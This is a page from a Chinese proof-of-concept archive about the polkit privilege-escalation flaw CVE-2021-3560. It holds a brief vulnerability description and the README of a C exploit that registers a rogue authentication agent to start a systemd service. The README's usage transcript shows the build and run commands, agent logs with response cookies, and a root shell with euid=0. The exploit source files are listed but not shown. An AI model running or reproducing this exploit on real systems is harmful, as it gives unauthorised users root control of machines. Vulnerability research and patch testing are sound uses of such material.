关联漏洞
标题:
polkit 代码问题漏洞
(CVE-2021-3560)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 存在代码问题漏洞,该漏洞源于当请求进程在调用polkit_system_bus_name_get_creds_sync之前断开与dbus-daemon的连接时,该进程无法获得进程的唯一uid和pid,也无法验证请求进程的特权。
描述
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
介绍
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
====
C implementation of CVE-2021-3560 exploitation, blog posts about this exploitation:
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation
### Contributors
Code by swing (@WinMin), Ricter Z(@RicterZ)
### Usage
```
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#
```
文件快照
[4.0K] /data/pocs/acff4e2b32d047accd8bacd01e5390a794fa24d4
├── [6.8K] agent.c
├── [ 68] agent.h
├── [4.1K] exploit.c
├── [ 376] Makefile
└── [2.5K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。